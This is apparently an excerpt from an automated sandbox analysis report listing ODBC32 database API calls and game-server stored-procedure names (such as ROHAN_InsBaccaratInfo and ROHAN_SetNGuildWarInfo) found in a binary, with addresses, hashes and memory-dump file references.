                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsBaccaratInfo](?,?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-187441142
                                                                                      • Opcode ID: e210eab63132a4498e75b6d13b39d0ccb44b9cd59727e60f7add3a9e461d6017
                                                                                      • Instruction ID: 3fa07e850027e7bf786208ee860f5f36d99b2a287fe67b1e8e1374150a47d738
                                                                                      • Opcode Fuzzy Hash: e210eab63132a4498e75b6d13b39d0ccb44b9cd59727e60f7add3a9e461d6017
                                                                                      • Instruction Fuzzy Hash: 856137716882157BFF648B64CC5AFA97334EB84B14F208388F76D7E2D1D5B16D808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_IncAbility](?, ?, ?, ?, ?, ?, ?, ?)},000000FD), ref: 0042C1AD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C1EC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C221
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042C259
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C291
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C2C9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C301
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C339
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C371
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042C3A9
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_IncAbility](?, ?, ?, ?, ?, ?, ?, ?)}, xrefs: 0042C1A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_IncAbility](?, ?, ?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-1957751959
                                                                                      • Opcode ID: d645b3f5ced62a4f5e0f59958542cd6e251e364cc6608319b9f5fc126829f1c4
                                                                                      • Instruction ID: 7985b5565c4fac8a4e785060904c1aadb5a2107f2a5a269469c79f59bbc26a8c
                                                                                      • Opcode Fuzzy Hash: d645b3f5ced62a4f5e0f59958542cd6e251e364cc6608319b9f5fc126829f1c4
                                                                                      • Instruction Fuzzy Hash: 5F5104F0A45614BBEB248B64CC56FAA7334FB84B18F104288F79C6E2C5D7B26D418B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetNGuildWarInfo] (?,?,?,?,?,?,?,?)},000000FD), ref: 004342C4
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00434303
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00434338
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00434370
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004343A8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004343E0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00434418
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00434450
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00434488
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004344C0
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetNGuildWarInfo] (?,?,?,?,?,?,?,?)}, xrefs: 004342BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetNGuildWarInfo] (?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-2468199598
                                                                                      • Opcode ID: 6a2f30625ad95400f465f12fd8743b1f319bfc2348f9bde4fab22e9902ec7f57
                                                                                      • Instruction ID: 8ffdc4ad92d09df7bb456320f86571d9d7abcd0856e5854055886bf29f085d29
                                                                                      • Opcode Fuzzy Hash: 6a2f30625ad95400f465f12fd8743b1f319bfc2348f9bde4fab22e9902ec7f57
                                                                                      • Instruction Fuzzy Hash: 1F510071B843147BEB248B54CC52FAA7334EB85B28F14C288F6587E6C5D6B26E408F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsIndunRanker] (?,?,?,?,?,?,?,?)},000000FD), ref: 0043B6F3
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043B732
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043B767
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043B79F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B7D7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043B80F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043B847
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043B87F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B8B7
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000028,00000000,?,00000029,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043B8EF
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsIndunRanker] (?,?,?,?,?,?,?,?)}, xrefs: 0043B6EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsIndunRanker] (?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-608012760
                                                                                      • Opcode ID: 83109631229b2a8bf1cd69d7836aee7ada931dad14a628cf93b92ce27d7dda0f
                                                                                      • Instruction ID: d543e9b0ede3afdafdfad87a3ea476860da9ec8a7db97dd4220946c977898703
                                                                                      • Opcode Fuzzy Hash: 83109631229b2a8bf1cd69d7836aee7ada931dad14a628cf93b92ce27d7dda0f
                                                                                      • Instruction Fuzzy Hash: 8D5113B4A802167BEB349B54CC52FBA7334EB88B14F108298F7147F6C6D6B17D409B58
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 004446A3
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 004446C7
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004446EB
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044470F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 00444733
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00444757
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044477B
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044479F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004447C3
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004447E7
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044480B
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044482F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95c58b32d424ce54b634109185a234e4c84e2a2055f6b22431c39357474f950a
                                                                                      • Instruction ID: 58dc910abaf5156ee63ba7d01966b9dea4d4c5c5a0ea3777b9dd6cd9b1e4aa27
                                                                                      • Opcode Fuzzy Hash: 95c58b32d424ce54b634109185a234e4c84e2a2055f6b22431c39357474f950a
                                                                                      • Instruction Fuzzy Hash: FF51A5B1E40708ABDB14DF89CE51FAEB3B9EB84718F208209F6196F3C5D675AD108758
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044486D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00444891
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004448B5
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 004448D9
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 004448FD
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00444921
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00444945
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 00444969
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044498D
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004449B1
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 004449D5
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 004449F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70c1820db5655a7d68d61d99761d8825f3774138d721092e7fcd1cb132ea599e
                                                                                      • Instruction ID: f73c4b884e1ca7f7141de4d38112a95dd2320ac5cb0809c4090d8406f14cba1e
                                                                                      • Opcode Fuzzy Hash: 70c1820db5655a7d68d61d99761d8825f3774138d721092e7fcd1cb132ea599e
                                                                                      • Instruction Fuzzy Hash: ED51A3B1E00608ABDB14DF99CC51FAEB779EB84718F10C209F6296F3C6D675A850CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsNGuildMember] (?,?,?,?,?,?,?) } ,000000FD), ref: 004254EC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042552B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425563
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425598
